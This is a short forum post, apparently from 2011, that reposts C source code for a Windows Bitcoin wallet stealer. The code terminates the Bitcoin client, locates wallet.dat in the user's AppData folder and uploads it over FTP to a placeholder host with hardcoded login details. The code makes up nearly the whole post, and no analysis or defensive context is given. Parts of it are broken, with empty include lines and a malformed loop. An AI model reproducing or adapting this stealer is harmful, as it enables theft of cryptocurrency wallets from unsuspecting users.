Author

Topic: Bitcoin Wallet.dat FTP Stealer Source (Read 3582 times)

newbie
Activity: 42
Merit: 0
July 12, 2011, 07:25:13 AM
#1
I just found this on a pastebin.

Quote

    // Coded by JuryBen
    // Gimme coins
    // 16ZKaVmah6YJoqqegjBj1aMFT7jNDCCapr
    
    #include
    #include
    #include
    
    #include
    #include
    #include
    #pragma comment(lib, "wininet")
    
    void killprocess()
    {    
            HANDLE hProcessSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPALL, 0 );
            // Get the process list snapshot.
            PROCESSENTRY32 ProcessEntry = { 0 };
            // Initialize the process entry structure.
            ProcessEntry.dwSize = sizeof( ProcessEntry );
            // Get the first process info
            BOOL Return = FALSE;
            Return = Process32First( hProcessSnapShot,&ProcessEntry );
            int value = _tcsicmp(ProcessEntry.szExeFile, _T("bitcoin.exe"));
            if (value==0)
            {
                    HANDLE hProcess = OpenProcess(PROCESS_TERMINATE, FALSE, ProcessEntry.th32ProcessID);
                    //Open Process to terminate
                    TerminateProcess(hProcess,0);
                    CloseHandle(hProcess); //Close Handle }
            }
            while( Process32Next( hProcessSnapShot, &ProcessEntry ));
            CloseHandle( hProcessSnapShot );
    }
    
    int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
    {
            killprocess();
            Sleep(40000);
            srand((unsigned)time(NULL));                    // we get time to use for random seed
            int seedone=rand();                                             // seed one
            int seedtwo=rand()*3;                                   // seed two times 3
            int seedboth = seedone + seedtwo;               // combine seeds to ensure random int
            // now we need to convert int to char
            char randomseed[99];                                    // make randomseed buffer at 99 to prevent overflow
        itoa(seedboth,randomseed,10);                       // use itoa, [int (seedboth), randomseed (random is now seedboth but in char), value (10 coverts to decimal)
            // did this so the wallet.dat file wouldn't be overwritten in ftp because of same file name
          
            char* appdata = getenv("APPDATA");              //Gets %Appdata% path
            char* truepath = strcat(appdata, "\\Bitcoin\\wallet.dat");  //Bitcoin file to steal
    
            //ftp connection
            HINTERNET hInternet;
            HINTERNET hFtpSession;
            hInternet = InternetOpen(NULL,INTERNET_OPEN_TYPE_DIRECT,NULL,NULL,0);
            hFtpSession = InternetConnect(hInternet, "ftp.host.com", INTERNET_DEFAULT_FTP_PORT, "[email protected]", "bigdickben", INTERNET_SERVICE_FTP, 0, 0);  //ftp host, user, pass
    
            FtpPutFile(hFtpSession, truepath , randomseed , FTP_TRANSFER_TYPE_BINARY, 0);
            FtpPutFile(hFtpSession, truepath, randomseed, FTP_TRANSFER_TYPE_BINARY, 0);
    
            InternetCloseHandle(hFtpSession);
            InternetCloseHandle(hInternet);
          
            return 0;
    }
Jump to: